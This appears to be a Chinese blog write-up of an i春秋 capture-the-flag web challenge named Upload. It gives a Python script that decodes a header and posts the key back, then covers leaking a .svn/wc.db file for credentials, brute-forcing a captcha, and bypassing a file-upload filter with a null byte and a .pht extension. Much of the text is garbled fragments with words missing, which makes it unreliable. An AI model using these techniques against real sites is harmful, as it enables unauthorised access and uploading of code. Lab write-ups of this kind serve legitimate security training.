i春秋Upload

匿名 (未验证) 提交于 2019-12-02 23:57:01

posti

cookie

 

 

post

import base64,requests

def main():

    a = requests.session()

    b = a.get("http://549bc9defbb74fc5bf83a53d5f194bccf641983365c0447b.changame.ichunqiu.com/")

    key1 = b.headers["flag"]

    c = base64.b64decode(key1)

    d = str(c).split(':')

    key = base64.b64decode(d[1])

    body = {"ichunqiu":key}

    f = a.post("http://549bc9defbb74fc5bf83a53d5f194bccf641983365c0447b.changame.ichunqiu.com/",data=body)

    print (f.text)

if __name__ == '__main__':

    main()

跑出来是一串字符串

 

 

字符串的意思是提示我们一个路径,不管了,访问之

Url/3712901a08bb58557943ca31f3487b7d

进去是一个普普通通的跳转界面,看源码没什么特别的

点按钮进入下一界面

 

 

就是一个登录界面了

尝试注入

注入失败。。。

md5

username

wpsvn

http://549bc9defbb74fc5bf83a53d5f194bccf641983365c0447b.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/.svn/wc.db

usernamepasswordmd5

 

 

username8638d5263ab0d3face193725c23ce095

密码随便填

验证码爆破

就可以登录成功了

 

 

但是登录后并没有什么东西,还是原来的输入账号密码验证码。。。。

看了提示才知道弹窗上面有个文件名

不多说,访问之

http://549bc9defbb74fc5bf83a53d5f194bccf641983365c0447b.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/7815696ecbf1c96e6894b779456d330e.php

是一个文件上传的界面

phpJPG

 

 

。。。。。

被嘲笑了似乎

wp0x00

jpgbpsubmitpht

Goflag

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!